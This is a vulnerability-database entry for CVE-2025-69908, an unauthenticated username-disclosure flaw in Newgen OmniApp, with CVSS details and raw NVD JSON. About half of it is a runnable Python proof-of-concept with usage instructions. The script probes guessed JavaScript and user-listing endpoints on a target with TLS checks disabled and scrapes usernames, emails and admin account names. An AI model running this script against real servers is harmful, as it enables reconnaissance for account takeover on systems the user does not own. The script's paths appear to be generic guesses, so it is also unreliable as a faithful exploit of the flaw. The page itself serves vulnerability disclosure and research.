Security Vulnerability Report
中文
CVE-2025-69908 CVSS 7.5 HIGH

CVE-2025-69908

Published: 2026-01-23 16:15:52
Last Modified: 2026-02-11 19:42:40
Source: [email protected]

Description

An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:newgensoft:omniapp:-:*:*:*:*:*:*:* - VULNERABLE
Newgen OmniApp (所有版本,在补丁发布前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re import sys # CVE-2025-69908 PoC - Newgen OmniApp Username Enumeration # Description: Unauthenticated information disclosure via accessible JavaScript resources def exploit_cve_2025_69908(target_url): """ Exploit script for CVE-2025-69908 This PoC demonstrates how to enumerate valid usernames from Newgen OmniApp """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-69908...") # Common JavaScript resource paths in Newgen OmniApp js_paths = [ "/static/js/app.js", "/static/js/vendor.js", "/assets/js/main.js", "/scripts/app.js", "/webapp/js/common.js", "/omniapp/js/validation.js" ] discovered_users = [] for js_path in js_paths: url = target_url.rstrip('/') + js_path print(f"\n[*] Checking: {url}") try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: content = response.text # Search for username patterns in JavaScript # Common patterns: usernames, email-like strings, user IDs patterns = [ r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}', # Email patterns r'user["\':\s]+([a-zA-Z0-9_]+)', # user: "username" r'username["\':\s]+([a-zA-Z0-9_]+)', r'"(admin|root|superuser|manager)"', # Privileged usernames r'userId["\':\s]+([0-9]+)', ] for pattern in patterns: matches = re.findall(pattern, content, re.IGNORECASE) for match in matches: if match not in discovered_users: discovered_users.append(match) print(f"[+] Found potential username: {match}") # Check for API endpoints that might reveal usernames api_patterns = re.findall(r'["\'](/api/[^"\']+)["\']', content) if api_patterns: print(f"[i] Discovered API endpoints: {api_patterns[:5]}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") # Try enumeration endpoint if discovered enum_endpoints = [ "/api/users", "/api/v1/users/list", "/services/userService/getUsers" ] for endpoint in enum_endpoints: url = target_url.rstrip('/') + endpoint print(f"\n[*] Testing enumeration endpoint: {url}") try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: data = response.json() print(f"[+] Potential user data: {data}") except: pass print(f"\n[*] Total discovered users: {len(discovered_users)}") for user in discovered_users: print(f" - {user}") return discovered_users if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://vulnerable-server.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_69908(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69908", "sourceIdentifier": "[email protected]", "published": "2026-01-23T16:15:52.453", "lastModified": "2026-02-11T19:42:40.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource."}, {"lang": "es", "value": "Una vulnerabilidad de revelación de información no autenticada en Newgen OmniApp permite a los atacantes enumerar nombres de usuario válidos con grandes privilegios a través de un recurso JavaScript del lado del cliente de acceso público."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newgensoft:omniapp:-:*:*:*:*:*:*:*", "matchCriteriaId": "BFF418D8-F9AF-4E2A-B16E-578A20319107"}]}]}], "references": [{"url": "https://github.com/CBx216/CVE-Newgen-Software-Advisories/blob/main/CVE-2025-69908.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://newgensoft.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.